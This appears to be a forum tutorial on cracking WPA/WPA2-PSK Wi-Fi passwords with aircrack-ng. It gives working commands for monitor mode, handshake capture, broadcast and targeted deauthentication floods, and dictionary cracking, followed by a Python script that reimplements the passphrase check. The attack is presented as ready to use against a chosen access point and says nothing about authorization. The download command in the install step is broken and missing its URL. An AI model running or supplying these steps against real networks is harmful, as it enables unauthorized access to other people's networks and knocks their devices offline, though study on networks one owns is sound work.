Markbank
Nov 4, 2018
This article is a summary of effective commands that just work.

With the help of these commands you will be able to crack WPA/WPA2 Wi-Fi access points that use PSK (Pre-Shared Key) authentication.

The objective is to capture the WPA/WPA2 four-way authentication handshake and then crack the PSK using aircrack-ng. The attack is offline: every input to the key derivation except the passphrase (the ESSID, both MAC addresses, both nonces and the MIC) is transmitted in the clear, so once the handshake is captured candidate passphrases can be tested without ever touching the AP again.

The full tutorial about WPA/WPA2 cracking can be found here.

Here are the basic steps we will be going through:

0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake

Install the Latest Aircrack-ng

Code:
sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download, build and install the latest aircrack-ng (build as a normal user; only the install step needs root):

Code:
-O - | tar -xz
cd aircrack-ng-1.2-rc1
make
sudo make install
Start the Wireless Interface in Monitor Mode

Find and kill the processes (typically NetworkManager, wpa_supplicant and dhclient) that would otherwise keep hopping channels or resetting the interface:

Code:
sudo airmon-ng check kill
Start the wireless interface in monitor mode:

Code:
sudo airmon-ng start wlan0
Notice that airmon-ng enabled monitor mode on mon0:

Code:
Interface Chipset Driver

wlan0 RTL3137 wifi - [phy0]
(monitor mode enabled on mon0)
So, the correct interface name to use in later parts of the tutorial is mon0. Newer aircrack-ng releases name the monitor interface after the original one (wlan0mon) instead; use whatever name airmon-ng reports, and confirm with iwconfig or iw dev that the interface is in monitor mode before continuing.

Start Airodump-ng to Collect Authentication Handshake

Now that our wireless adapter is in monitor mode, we can see all the wireless traffic passing by in the air.

This is done with the airodump-ng command:

Code:
sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

Code:
CH  1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

00:11:22:33:44:55  -33      212    1536   66   1  54e  WPA2  CCMP    PSK   CrackMe
66:77:88:99:00:11  -69      134     345   34   1  54e  WPA2  CCMP    PSK   AsusAP

BSSID              STATION            PWR  Rate    Lost  Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44   0 - 1     114      56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78   0 - 1       0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78   2 -32       0       1
Check the ENC, CIPHER and AUTH columns before going further: the steps below apply to APs showing WPA or WPA2 with AUTH PSK. A network showing MGT uses 802.1X/EAP and has no pre-shared key to crack.
Now start airodump-ng on the AP channel with a filter for the BSSID to collect the authentication handshake for the access point we are interested in:

Code:
sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
-c The channel of the wireless network
--bssid The MAC address of the access point
-w The file name prefix for the capture files; airodump-ng appends a sequence number, so the first capture is written to WPAcrack-01.cap
mon0 The wireless interface
--ignore-negative-one Removes the 'fixed channel : -1' message

Now wait until airodump-ng captures a handshake, or go to step #3 if you want to force this process. A handshake is only exchanged when a client connects or reconnects, so an AP with no stations listed in the lower part of the screen will not produce one on its own.

After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.

This means airodump-ng has successfully captured the handshake.

Code:
CH  1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 ][ WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

00:11:22:33:44:55  -48      212    1536   66   1  54e  WPA2  CCMP    PSK   CrackMe

BSSID              STATION            PWR  Rate    Lost  Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44   0 - 1     114      56
Use Aireplay-ng to Deauthenticate the Wireless Client

This step is optional. If you can't wait until airodump-ng captures a handshake, you can send the wireless client a deauthentication frame saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake. Keep the airodump-ng capture from step #2 running in another terminal while you do this; the deauth is only useful if the reconnection is recorded.

Send DeAuth to broadcast:

Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Send directed DeAuth (the attack is more effective when it is targeted):

Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
--deauth 100 The number of deauthentication bursts to send, 64 frames each (0 for unlimited)
-a The MAC address of the access point
-c The MAC address of the client
mon0 The wireless interface
--ignore-negative-one Removes the 'fixed channel : -1' message

This works only because management frames are unauthenticated on networks without 802.11w (Protected Management Frames). If the AP and the client negotiate PMF, forged deauthentication frames are ignored and you have to wait for a natural reconnection.

Run Aircrack-ng to Crack WPA/WPA2-PSK

To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here. Candidates shorter than 8 or longer than 63 characters are skipped, since a WPA passphrase cannot have that length, and because the ESSID is salted into the key derivation the same wordlist has to be rehashed from scratch for every network.

Crack the WPA/WPA2-PSK with the following command:

Code:
aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack-01.cap
-w The name of the dictionary file
-b The MAC address of the access point
WPAcrack-01.cap The capture file written by airodump-ng in step #2 that contains the authentication handshake
Code:
Aircrack-ng 1.2

[00:08:11] 548872 keys tested (1425.24 k/s)

KEY FOUND! [ iloveporno ]

Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5

Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3

EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
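The three values in the output above are the stages of the WPA-PSK key derivation, which is also exactly what aircrack-ng recomputes for every candidate passphrase: the Master Key is the PMK (PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, 4096 rounds, 32 bytes), the Transient Key is the PTK expanded from the PMK with the two MAC addresses and the two nonces, and the EAPOL HMAC is the MIC over the second handshake message, keyed with the first 16 bytes of the PTK. A candidate is correct when its recomputed MIC matches the one captured in the air. The following Python script is an added example and not code from this post or from the aircrack-ng project; it builds a constructed WPA2 handshake (ESSID and MAC addresses taken from the tables above, the nonces and the passphrase n0t-th3-real-0ne are invented here) and recovers the passphrase from a small inline wordlist with that same check.

```python
"""Worked model of the WPA/WPA2-PSK check aircrack-ng performs on a captured
four-way handshake. Added example; the handshake below is constructed, not captured."""
import hashlib
import hmac
from typing import Iterable, Optional

# EAPOL-Key layout: 4-byte 802.1X header, then the key descriptor fields.
KEY_INFO_OFF = 5   # 2 bytes; the low 3 bits hold the key descriptor version
MIC_OFF = 81       # start of the 16-byte Key MIC field
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK ('Master Key' in aircrack-ng output): PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.
    This is the expensive step and the only one that depends on the passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK ('Transient Key'): PRF-512 over the ordered MAC addresses and nonces.
    All of these inputs except the PMK are sent in the clear during the handshake."""
    label = b"Pairwise key expansion"
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_zeroed: bytes, descriptor_version: int) -> bytes:
    """MIC ('EAPOL HMAC') over the EAPOL-Key frame with its MIC field zeroed, keyed by
    KCK = PTK[0:16]. Version 1 (WPA/TKIP) is HMAC-MD5; version 2 (WPA2/CCMP) is
    HMAC-SHA1 truncated to 16 bytes."""
    if descriptor_version == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    if descriptor_version == 2:
        return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"unsupported key descriptor version {descriptor_version}")


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
              eapol_frame: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: rederive PMK -> PTK -> MIC for each candidate and compare
    against the MIC captured in message 2. Returns the passphrase or None."""
    captured_mic = eapol_frame[MIC_OFF:MIC_OFF + MIC_LEN]
    zeroed = eapol_frame[:MIC_OFF] + bytes(MIC_LEN) + eapol_frame[MIC_OFF + MIC_LEN:]
    version = int.from_bytes(eapol_frame[KEY_INFO_OFF:KEY_INFO_OFF + 2], "big") & 0x07
    for word in wordlist:
        candidate = word.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:   # a WPA passphrase is 8..63 characters
            continue
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed, version), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP): RSN descriptor, Key Info 0x010a
    (version 2, Pairwise, MIC bit set), empty key data. Constructed for this example."""
    body = (b"\x02"                       # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                 # key information
            + b"\x00\x00"                 # key length (0 in message 2)
            + (1).to_bytes(8, "big")      # replay counter
            + snonce                      # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID (all zero)
            + mic                         # key MIC
            + b"\x00\x00")                # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X: v1, EAPOL-Key


# Constructed sample: ESSID and MACs from the airodump-ng tables; nonces and passphrase invented.
SSID = "CrackMe"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("aabbccddeeff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "n0t-th3-real-0ne"   # hypothetical; not the key shown in the post
WORDLIST = ["password", "12345678", "letmein1", "short", REAL_PASSPHRASE, "qwerty123"]


def make_sample_handshake(passphrase: str) -> bytes:
    """Play the client's role: derive the PTK and emit message 2 with a valid MIC."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE), 2))


def demo() -> Optional[str]:
    """Crack the constructed handshake with the inline wordlist."""
    frame = make_sample_handshake(REAL_PASSPHRASE)
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, frame, WORDLIST)


if __name__ == "__main__":
    print("KEY FOUND!", demo())
```

The wordlist loop shows where the cost sits: the PBKDF2 step is 4096 HMAC-SHA1 rounds per candidate and per ESSID, which is why aircrack-ng reports a rate in k/s rather than M/s and why the same dictionary has to be rehashed for a network with a different ESSID.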
 
